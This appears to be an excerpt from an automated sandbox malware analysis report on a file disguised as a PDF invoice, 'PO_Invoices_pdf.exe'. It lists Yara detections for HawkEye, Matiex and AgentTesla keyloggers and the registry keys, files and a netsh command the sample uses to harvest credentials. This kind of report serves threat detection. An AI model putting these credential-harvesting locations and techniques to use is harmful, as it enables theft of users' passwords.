                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Yara detected MailPassViewShow sources
                            Source: Yara matchFile source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.446713470.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.296594780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: dropped/hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 17.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.34fa72.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.3a27e00.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a9fa72.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.34fa72.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.41b7e00.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a9fa72.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.41b7e00.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.3a27e00.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Yara detected Matiex KeyloggerShow sources
                            Source: Yara matchFile source: 00000008.00000002.681623451.0000000000F72000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001E.00000002.681849072.0000000000BD2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 8.2.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.0.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.0.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Tries to harvest and steal WLAN passwordsShow sources
                            Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Tries to harvest and steal browser information (history, passwords, etc)Show sources
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            Tries to harvest and steal ftp login credentialsShow sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                            Tries to steal Instant Messenger accounts or passwordsShow sources
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                            Tries to steal Mail credentials (via file access)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                            Yara detected WebBrowserPassView password recovery toolShow sources
                            Source: Yara matchFile source: 00000023.00000002.465758929.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.308131659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: dropped/hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.3a27e00.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.3a40240.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.41d0240.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.41b7e00.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.41d0240.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.3a40240.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: origigoods40.exe PID: 6172, type: MEMORY

                            Remote Access Functionality:

                            barindex
                            Detected HawkEye RatShow sources
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                            Source: hawkgoods.exeString found in binary or memory: HawkEyeKeylogger
                            Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                            Yara detected AgentTeslaShow sources
                            Source: Yara matchFile source: 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.445463818.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
